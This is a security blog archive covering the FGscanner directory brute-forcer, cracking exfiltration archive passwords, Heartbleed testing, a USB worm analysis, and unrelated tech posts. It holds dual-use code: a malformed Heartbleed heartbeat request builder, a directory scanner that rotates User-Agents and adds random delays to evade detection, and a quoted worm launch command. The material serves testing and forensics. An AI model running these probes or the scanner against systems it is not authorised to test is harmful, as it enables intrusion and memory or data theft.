FgScanner included in BlackArch Linux

FGscanner has been included in BlackArch Linux. What is BlackArch Linux?

“BlackArch Linux is a lightweight expansion to Arch Linux for penetration testers and security researchers.

The repository contains 1059 tools. You can install tools individually or in groups. BlackArch is compatible with existing Arch installs. For more information, see the installation instructions. Please note that although BlackArch is past the beta stage, it is still a relatively new project. To report bugs and request new tools, please visit the issue tracker on Github, stop by IRC, or email us.”

FGscanner reads the directory wordlist and checks the HTTP status code returned for each entry. If the directory exists on the target, FGscanner then reads the page list and runs a dictionary-based check inside that directory. With the --dump switch, every page that exists is written to disk.

If you need to reduce the chance of detection you can use the advanced options:

  • --tor routes the GET requests over the Tor network (a Tor daemon must be running on your system)
  • --tordns resolves the target name through Tor as well (otherwise the DNS query goes to your own resolver and reveals the target you are scanning)
  • --sec slows down the scan, or randomizes the time between requests
  • --uarnd randomizes the User-Agent header on each request.

Malware related archives decryption using strings command

The cyber attack landscape is evolving rapidly, reaching high levels of sophistication and complexity in order to exploit and breach enterprises, government entities, universities, financial institutions, etc., even where properly designed and well maintained defense-in-depth strategies are in place. The main stages of a targeted attack can be summarized in the following five steps:

  • Investigate
  • Infiltrate
  • Explore
  • Exfiltrate
  • Maintain Access

Each stage needs advanced tools and techniques to be completed stealthily, and the tools are often very specific to each target. In many cases these tools are written by the criminals only a few hours before they are deployed into the targeted network, precisely to evade detection systems and signature-based analysis. Alongside these custom tools, attackers also use commercial utilities for many other activities: encryption, packaging, remote execution, remote access, etc.

RAR and ZIP archives are commonly used to compress and encrypt stolen data during the exfiltration phase of the attack. RAR is preferred to ZIP thanks to its AES encryption (AES-128 in RAR 3.x archives, AES-256 in RAR 5), its command-line utilities for many architectures and operating systems, and its optional header encryption (the -hp switch), which hides even the file names inside the archive.

Very often these archives are generated automatically by malware, scheduled tasks, command-line utilities or the attackers' own actions, and they can be identified in the infected filesystems, or during a forensic analysis, by their filename structure: YEAR_MONTH_DAY_USERID_HOSTNAME.RAR or similar, for example.

If the archive headers are encrypted, even the content listing is unavailable, so we cannot tell which data are included in the stolen archives and we have to start a password recovery task in order to open the files.
There are several options to achieve the goal:

  • free or commercial tools on a single host
  • commercial tools for distributed tasks over several machines
  • online password recovery services
  • GPU cracking utils
  • hardware acceleration based on FPGA

Each method listed above could require hours, days, months or years to be completed depending on the password length and/or complexity used to protect the files, but we can speed up the process using a very specific dictionary file containing malware-related strings.

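As an added example, not code from the original post, here is a small Python stand-in for the `strings`-based dictionary build described above. It pulls printable ASCII and UTF-16LE runs out of a sample the way `strings -a` and `strings -el` would (Windows malware keeps most of its text as UTF-16LE), splits each run into tokens, and also strips the inline password switches that rar (`-hpSECRET`, `-pSECRET`) and 7-Zip (`-pSECRET`) accept, so a password embedded in a command line lands in the wordlist on its own. The sample blob, its command line and the key string are constructed for the demo; the resulting list is meant to be fed to the cracker of your choice.

```python
import re
from typing import Dict, Iterable, Iterator, List

MIN_LEN = 4  # GNU strings default minimum length


def extract_strings(data: bytes, min_len: int = MIN_LEN) -> Iterator[str]:
    """Printable runs as `strings -a` (ASCII) and `strings -el` (UTF-16LE) would print them."""
    ascii_run = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    utf16_run = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    for m in ascii_run.finditer(data):
        yield m.group().decode("ascii")
    for m in utf16_run.finditer(data):
        yield m.group().decode("utf-16-le")


# Separators found in command lines, paths and config blobs; every piece becomes a candidate.
_SPLIT_RE = re.compile(r"[\s\\/:;,=\"'<>|()\[\]{}]+")
# Archiver switches that carry the password inline: rar `-hpSECRET` / `-pSECRET`, 7z `-pSECRET`.
_PASSWORD_SWITCHES = ("-hp", "-p")


def build_wordlist(samples: Iterable[bytes], min_len: int = MIN_LEN, max_len: int = 64) -> List[str]:
    """Dictionary of every string and sub-token found in the samples, deduplicated, first-seen order."""
    seen: Dict[str, None] = {}

    def add(word: str) -> None:
        if min_len <= len(word) <= max_len:
            seen.setdefault(word, None)

    for blob in samples:
        for s in extract_strings(blob, min_len):
            add(s.strip())                       # the whole run (passwords with spaces survive here)
            for token in _SPLIT_RE.split(s):
                add(token)                       # each token
                for switch in _PASSWORD_SWITCHES:
                    if token.startswith(switch):
                        add(token[len(switch):])  # the password without the archiver switch
    return list(seen)


# Constructed stand-in for a dropper (not a real sample): a fake PE header, an ASCII rar
# command line, a UTF-16LE key string and a path fragment, separated by junk bytes.
SAMPLE_BLOB = (
    b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
    + b"rar a -hpSup3rS3cr3t! %s.rar %s\x00\x01\x02\x03"
    + "ExfilK3y2014".encode("utf-16-le")
    + b"\x00\x00\x7f\x80C:\\ProgramData\\upd\\\x00"
)

if __name__ == "__main__":
    for word in build_wordlist([SAMPLE_BLOB]):
        print(word)
```

Run it against the real dropper, the scheduled-task script and any batch files recovered from the host, and merge the output with a generic wordlist: the malware-specific words go first because they are the ones most likely to hit.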


Windows 8 upgrade: the nightmare begins

Some days ago I was asked to help a friend choose a new laptop: she explained to me her budget, the target applications and her needs. At the end of the scouting process we decided together to buy an Asus N550L notebook.
The configuration is awesome: Intel i7-4500U, 8 GB RAM, 1 TB hard drive at 5400 rpm (this is the real bottleneck!!!), Nvidia GeForce 745M with 4 GB, Bluetooth 4.0, aluminium case, everything packed in a 15.6″ form factor.

First of all I wanted to buy a Windows 7 Professional license and downgrade the system, but the vendor told me that Windows 7 is not supported by Asus on the N550L. Searching the Asus website I found drivers and utilities for Windows 8 only... I'm really disappointed about this because I'm quite sure that Windows 7 is not yet End Of Life! Anyway: I moved on to plan B and decided to upgrade to Windows 8.1 Update 1, as suggested by Microsoft, in order to work in Desktop mode... I'm sure she will appreciate the "new" look'n'feel...

At 5pm I started the laptop unboxing (the Asus package is very well done and really accurate) and the first Windows setup. I clicked on the Store box to start the Windows upgrade, but the system required all the latest updates to be installed before starting. The first round consisted of about 80 updates... and required a reboot. The second round consisted of about 20 new updates... and required a reboot... the last round was dedicated to driver upgrades and required a reboot. Well done: after about 1 hour installing updates and rebooting the laptop I was finally ready to start the upgrade. I chose the upgrade box in the Microsoft Store and the system told me that it needed to download 3.2 GB! Really, 3.2 GB! This is an upgrade? And what about a fresh install instead? Crazy... As you probably know, in Italy we are not famous for ADSL broadband connection speed (we are not famous for many other things either, but it doesn't matter), so the download took about 2 hours at 7 Mbit/s...



Cyber threats landscape and defense workshop

The Cyber threats landscape and defense workshop was held on April 14th at the ISIS "C. Facchinetti" Institute.
The two-hour workshop was intended to illustrate and explain the evolution of cyber threats over the last years and the current scenario.

About 50 participants attended the event and followed the topics explained: from the first virus, created in 1971 (Creeper was the first self-replicating program, written by Bob Thomas for the TENEX operating system, although many people believe that Brain, coded in 1986, was the first virus), to modern APT (Advanced Persistent Threat) attacks, supported by interactive sessions, a live demo and a great movie produced by Trend Micro (you can watch the entire movie in HD on YouTube).

Today we can all be victims of cyber criminals, but we can be a little safer if we pay attention to our digital behaviour and know the threats that come with the technologies we use every day. Security awareness and user behaviour are among the most effective defenses against cyber crime, probably more than the most advanced security technology. We must protect our data starting from Layer 8, in a top-down approach :)

All the slides displayed during the workshop are now available on SlideShare.

Feel free to contact me if you have any questions, suggestions or requests.



Heartbleed Testing and Detecting

A critical vulnerability has been identified in OpenSSL versions 1.0.1 through 1.0.1f (CVE-2014-0160) and it is well explained on the Heartbleed website. An attacker can exploit this vulnerability to read up to 64 KB of the server process memory per heartbeat request, and can repeat the request as often as needed, which enables several attacks:

  • Read the server's SSL private key (and use it to decrypt captured traffic, past and future, of every session that did not use forward secrecy)
  • Retrieve clear-text usernames and passwords
  • Access source code

There are many resources available online to better understand how the bug works and how to fix it (upgrade to OpenSSL 1.0.1g or newer, as explained on the OpenSSL website). The fix is not just the package upgrade:

  • Upgrade to OpenSSL 1.0.1g (or your distribution's package carrying the backported fix) and restart every service that has the library loaded
  • Consider your private keys compromised and regenerate them
  • Replace the SSL certificates with ones issued for the new keys, and revoke the old ones
  • If possible, enable Perfect Forward Secrecy (PFS) cipher suites, so that a future key compromise cannot expose recorded traffic

How can I test if my systems are vulnerable ?

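As an added example, not from the post, here is a Python helper for the two checks you would run. `is_vulnerable_version()` screens an `openssl version` banner against the 1.0.1 to 1.0.1f range named in the CVE, with the caveat that distributions backported the fix without changing the version letter, so a banner alone gives false positives and must be confirmed by a heartbeat test or the package changelog. `build_heartbeat_request()` encodes the RFC 6520 heartbeat record a test tool sends, with a payload_length larger than the data actually sent, and `classify_response()` judges the bytes that come back: a vulnerable server echoes as many bytes as were claimed, a patched one checks the field against the record length and drops the message. Sending the record requires a TLS ClientHello exchange first, which is not included here; feed `classify_response()` the bytes your probe or packet capture returned. The sample responses used in the test are constructed.

```python
import re
import struct
from typing import List, Tuple

# TLS record content types (RFC 5246) and heartbeat message types (RFC 6520)
CT_ALERT, CT_HEARTBEAT = 0x15, 0x18
HB_REQUEST, HB_RESPONSE = 0x01, 0x02
MIN_PADDING = 16  # RFC 6520: a heartbeat message carries at least 16 bytes of padding


def is_vulnerable_version(banner: str) -> bool:
    """True for upstream OpenSSL 1.0.1 through 1.0.1f (the range in CVE-2014-0160).
    Distribution builds may carry the fix under the same letter: confirm with a test."""
    m = re.match(r"OpenSSL 1\.0\.1([a-z]?)\b", banner)
    return bool(m) and m.group(1) <= "f"


def build_heartbeat_request(claimed_len: int, payload: bytes = b"", version=(3, 2)) -> bytes:
    """TLS record carrying a HeartbeatRequest whose payload_length field claims `claimed_len`
    bytes although only len(payload) bytes follow. A vulnerable server copies `claimed_len`
    bytes from its request buffer into the reply; a patched one drops the message.
    version=(3, 2) is TLS 1.1; use (3, 1) or (3, 3) to match what the server negotiated."""
    message = struct.pack("!BH", HB_REQUEST, claimed_len) + payload + b"\x00" * MIN_PADDING
    return struct.pack("!BBBH", CT_HEARTBEAT, version[0], version[1], len(message)) + message


def parse_records(data: bytes) -> List[Tuple[int, Tuple[int, int], bytes]]:
    """Split raw bytes read from the socket into (content_type, version, body) TLS records."""
    records = []
    while len(data) >= 5:
        ctype, major, minor, length = struct.unpack("!BBBH", data[:5])
        records.append((ctype, (major, minor), data[5:5 + length]))
        data = data[5 + length:]
    return records


def classify_response(data: bytes, sent_payload_len: int) -> Tuple[str, bytes]:
    """Judge what came back after a build_heartbeat_request() record was sent:
      ("vulnerable", leaked)  HeartbeatResponse claiming more bytes than we sent; `leaked` is the
                              echoed memory (an oversized reply spans several 16 KB records)
      ("echoed", payload)     an honest echo of exactly what we sent (request was well-formed)
      ("rejected", b"")       an alert: the server does not accept heartbeats at all
      ("silent", b"")         no heartbeat reply, the normal behaviour of a patched server"""
    leaked, claimed = b"", None
    for ctype, _, body in parse_records(data):
        if ctype == CT_ALERT and claimed is None:
            return "rejected", b""
        if ctype != CT_HEARTBEAT:
            continue
        if claimed is None:
            if len(body) < 3 or body[0] != HB_RESPONSE:
                continue
            claimed = struct.unpack("!H", body[1:3])[0]
            leaked += body[3:]
        else:
            leaked += body  # continuation record of the same oversized response
    if claimed is None:
        return "silent", b""
    if claimed > sent_payload_len:
        return "vulnerable", leaked[:claimed]
    return "echoed", leaked[:claimed]


if __name__ == "__main__":
    print(is_vulnerable_version("OpenSSL 1.0.1e 11 Feb 2013"))
    print(build_heartbeat_request(0x4000).hex())
```

Note what the version check does not cover: OpenSSL 1.0.2-beta1 was also affected, and 0.9.8 and 1.0.0 never had the heartbeat extension. When a heartbeat test is not possible, the package changelog is the only reliable answer for distribution builds.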


Unable to install VMware products

I spent the last two months trying to understand why I was unable to install VMware products on my Windows 7 Professional x64 workstation: double-click on the installer, accept the UAC warning... and nothing happens!! No errors, no events in the Event Viewer, no process in the Task Manager... nothing! I don't remember how many hours I spent googling for a solution...

One month ago I reinstalled the workstation due to some other issues and I was happy to install VMware Workstation, VMware Player and vSphere Client again... but all the products failed to install AGAIN!! I was really frustrated :(

Yesterday I was speaking with a highly skilled IT guy, so I asked him about this issue and his answer was "I never had this issue before... really strange!", and we both started to investigate the issue in depth again.

We found a useful article on the VMware Community forum about a similar issue installing VMware Player (https://communities.vmware.com/thread/408832): user Andrè describes the process "fixcamera.exe" as the VMware setup killer. I checked the Task Manager and it was running on my system! I killed the process and started the setup again: IT WORKS! Finally I solved this issue!!!



In-depth malware analysis of mmpifmxnth..vbs

Last week I was asked to check a Windows 7 x64 laptop due to extremely poor performance, so as a first step I ran a complete scan with Malwarebytes Anti-Malware free and Avira Antivirus. These two great free programs did a great job, cleaning more than 170 infected objects!! After the reboot another scan was started just to be sure that everything was fine, and the results confirmed the clean status.
Two days ago the same laptop started to create strange links on every USB stick plugged in, so I started a manual analysis of the behaviour (unfortunately my Cuckoo Sandbox is still being built and not ready yet): using a clean, freshly formatted pen drive, I copied a test folder onto the USB stick and after a few seconds that folder was hidden and replaced by a link with the same folder name pointing to the following command:
C:\Windows\system32\cmd.exe /c start mmpifmxnth..vbs&start explorer <folder_name>&exit
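As an added example (not part of the post), here is a Python scan to hunt for the same lure on a mounted stick: it flags every .lnk in the drive root whose embedded command matches the `cmd.exe /c start <name>.vbs` pattern quoted above, and reports whether the .vbs dropper and a same-named, shadowed folder sit next to it. A shortcut stores its target and arguments as UTF-16LE on any recent Windows, so the search tries that encoding (at both byte alignments) as well as 8-bit text. `build_sample_drive()` creates a constructed stand-in in a temporary directory: the "Photos" folder, its lure and the dropper are invented for the demo, and the .lnk is only a header plus the strings, not a real shortcut. The hidden-attribute check only has meaning on Windows.

```python
import os
import re
import stat
import tempfile
from typing import Dict, Iterator, List, Optional

# Shell link header: HeaderSize 0x4C followed by the LinkCLSID 00021401-0000-0000-C000-000000000046
LNK_HEADER = b"\x4c\x00\x00\x00" + bytes.fromhex("0114020000000000c000000000000046")
FILE_ATTRIBUTE_HIDDEN = 0x02  # value from the Windows API; also exported by the stat module
# Command line the lure runs, as quoted in the post: cmd.exe /c start <name>.vbs&start explorer <folder>&exit
_LURE_RE = re.compile(r"cmd\.exe.*?start\s+(\S+\.vbs)", re.IGNORECASE | re.DOTALL)


def _decodings(data: bytes) -> Iterator[str]:
    """StringData is UTF-16LE when the IsUnicode flag is set (the normal case) and ANSI otherwise;
    try 8-bit text first, then UTF-16LE at both possible byte offsets."""
    yield data.decode("latin-1")
    for offset in (0, 1):
        yield data[offset:].decode("utf-16-le", errors="ignore")


def lure_vbs_name(data: bytes) -> Optional[str]:
    """Name of the .vbs the shortcut launches, or None if the file is not such a lure."""
    if data[:4] != LNK_HEADER[:4]:  # not a shell link at all
        return None
    for text in _decodings(data):
        m = _LURE_RE.search(text)
        if m:
            return m.group(1)
    return None


def is_hidden(path: str) -> bool:
    attrs = getattr(os.stat(path), "st_file_attributes", 0)  # present on Windows only
    return bool(attrs & FILE_ATTRIBUTE_HIDDEN)


def find_lures(root: str) -> List[Dict[str, object]]:
    """Scan a drive root for .lnk files that launch a .vbs and shadow a same-named folder."""
    hits = []
    for entry in os.scandir(root):
        if not (entry.is_file() and entry.name.lower().endswith(".lnk")):
            continue
        with open(entry.path, "rb") as f:
            data = f.read()
        vbs = lure_vbs_name(data)
        if vbs is None:
            continue
        folder = os.path.join(root, entry.name[:-4])
        shadowed = os.path.isdir(folder)
        hits.append({
            "lnk": entry.path,
            "vbs": vbs,
            "dropper_present": os.path.isfile(os.path.join(root, vbs)),
            "shadowed_folder": shadowed,
            "folder_hidden": shadowed and is_hidden(folder),
        })
    return hits


def build_sample_drive() -> str:
    """Constructed stand-in for the infected stick: one folder, its lure .lnk, the dropper, one benign .lnk."""
    root = tempfile.mkdtemp(prefix="usb_")
    os.mkdir(os.path.join(root, "Photos"))
    open(os.path.join(root, "mmpifmxnth..vbs"), "w").close()
    target = r"C:\Windows\system32\cmd.exe"
    args = "/c start mmpifmxnth..vbs&start explorer Photos&exit"
    with open(os.path.join(root, "Photos.lnk"), "wb") as f:
        # a real link has LinkFlags, timestamps and an ItemIDList here; only the strings matter for the scan
        f.write(LNK_HEADER + b"\x00" * 56 + (target + "\x00" + args).encode("utf-16-le"))
    with open(os.path.join(root, "holiday.lnk"), "wb") as f:
        f.write(LNK_HEADER + b"\x00" * 56 + "notepad.exe".encode("utf-16-le"))
    return root


if __name__ == "__main__":
    for hit in find_lures(build_sample_drive()):
        print(hit)
```

On a real stick the `.vbs` and the lure usually have the hidden and system attributes set, so run the scan with a tool that does not skip them, and check the other roots the worm wrote to (every removable drive that was plugged in).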


SANS Holiday Challenge 2013 Report

The SANS Holiday Challenge is a high-skill ethical hacking technical exercise sponsored by SANS CyberCon and organized by the Counter Hack team.
The 2013 edition is the tenth annual installment and the biggest and best ever, organized by Ed Skoudis, Josh Wright & Tom Hessman.

During the Christmas holidays Giacomo and I started to work on the Challenge, reading the story and downloading the PCAP file provided by the Counter Hack team (you can find the details and the PCAP file on the SANS Pen Testing website). We spent several hours and funny late nights investigating the file, producing a detailed analysis of the attacks and creating a report that we submitted to the Counter Hack team for validation. We would also like to thank Mr. GaraNews, who helped us with the Bro and Snort analysis of the PCAP file during my stay in Germany!! :)

Today a blog post on the SANS Pen Testing website announced the winners and "honorable mentions" of the Holiday Challenge 2013: our report was given an "honorable mention" for the following reasons:

“Andrew and Giacomo had an excellent technical write-up with beautiful formatting, and even went the step further to ask “why” for each of the attacks (correctly citing that Mr. Potter wants to encourage the rapid growth of dental disease in Bedford Falls through manipulating drinking water fluoride levels). The team-of-two even went so far as to evaluate datestamp information in the “Firmware Update” phishing attack, identifying the 5-hour window between the upload of the ab-qfe.exe executable and the retrieval by Don Sawyer.”



FGscanner is available for Download

Hi All!
I finally completed FGscanner :)
FGscanner is a Perl script useful for finding directories that are not indexed, hidden pages, and development or test folders on a web server. The script works in dictionary-attack mode using two files (fg_dirs and fg_pages) and can be redirected through a proxy or the Tor network if a Tor daemon is running on your system.

The project is hosted on GitHub and you can download it here.

This is the initial release and any comment, contribution or suggestion is more than welcome ! :)
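The two-level dictionary walk described in this release note, and in more detail in the BlackArch post at the top of the page, written out in Python as an added example; this is not FGscanner's own Perl code. It keeps the same shape: probe each directory, and only inside the ones that answer with an "exists" status probe each page, handing every page found to a dump callback (the --dump idea). It adds the two evasion options the post lists that are easy to show, a fixed-plus-random delay between requests (--sec) and a random User-Agent per request (--uarnd), plus one check a practitioner wants before trusting any result: a soft-404 baseline, because a server that answers 200 to every path would otherwise make every wordlist entry look found. Tor routing (--tor, --tordns) is not implemented here. The host `example.test`, the URL table and the user-agent strings are constructed for the offline run.

```python
import random
import time
import urllib.error
import urllib.request
from typing import Callable, Dict, Iterable, Optional, Tuple

# Status codes that mean "the directory is there": 200 (listing or index page), 301/302
# (redirect, e.g. to add the trailing slash or to a login page) and 403 (present, listing denied).
EXISTS = {200, 301, 302, 403}

# Constructed pool for User-Agent rotation; extend with whatever blends into the target's traffic.
USER_AGENTS = [
    "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36",
    "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)",
]

Fetch = Callable[[str], Tuple[int, bytes]]  # url -> (status, body)


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow 3xx: the scanner wants the raw status, not where the redirect leads."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


_opener = urllib.request.build_opener(_NoRedirect)


def http_fetch(url: str, timeout: float = 10.0) -> Tuple[int, bytes]:
    """Live fetch with a random User-Agent on every request."""
    req = urllib.request.Request(url, headers={"User-Agent": random.choice(USER_AGENTS)})
    try:
        with _opener.open(req, timeout=timeout) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:  # urllib raises on 3xx/4xx/5xx instead of returning
        return err.code, err.read()


def make_fake_fetch(site: Dict[str, Tuple[int, bytes]],
                    default: Tuple[int, bytes] = (404, b"")) -> Fetch:
    """Offline stand-in for http_fetch, built from a constructed url -> (status, body) table."""
    return lambda url: site.get(url, default)


def _pause(delay: float, jitter: float) -> None:
    wait = delay + random.uniform(0.0, jitter)  # fixed delay plus random jitter between requests
    if wait > 0:
        time.sleep(wait)


def scan(base_url: str, dirs: Iterable[str], pages: Iterable[str], fetch: Fetch = http_fetch,
         delay: float = 0.0, jitter: float = 0.0,
         dump: Optional[Callable[[str, bytes], None]] = None) -> Dict[str, int]:
    """Probe each directory; inside the ones that exist probe each page. Returns {path: status}.
    dump(path, body) is called for every page found."""
    base = base_url.rstrip("/")
    pages = list(pages)
    # Soft-404 baseline: if a path that cannot exist still "exists", remember its
    # (status, body length) signature and treat identical answers as not found.
    status, body = fetch(f"{base}/{random.randrange(1 << 40):x}/")
    soft404 = (status, len(body)) if status in EXISTS else None

    def missing(status: int, body: bytes) -> bool:
        return status not in EXISTS or (status, len(body)) == soft404

    found: Dict[str, int] = {}
    for d in dirs:
        d = d.strip("/")
        dir_url = f"{base}/{d}/"
        status, body = fetch(dir_url)
        _pause(delay, jitter)
        if missing(status, body):
            continue
        found[f"/{d}/"] = status
        for p in pages:
            p = p.lstrip("/")
            status, body = fetch(dir_url + p)
            _pause(delay, jitter)
            if status == 200 and not missing(status, body):
                found[f"/{d}/{p}"] = status
                if dump:
                    dump(f"/{d}/{p}", body)
    return found
```

A real run is `scan("https://target", open("fg_dirs").read().split(), open("fg_pages").read().split(), delay=1.0, jitter=2.0, dump=...)`; the soft-404 baseline costs one extra request and saves reading through a wordlist-sized list of false positives.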

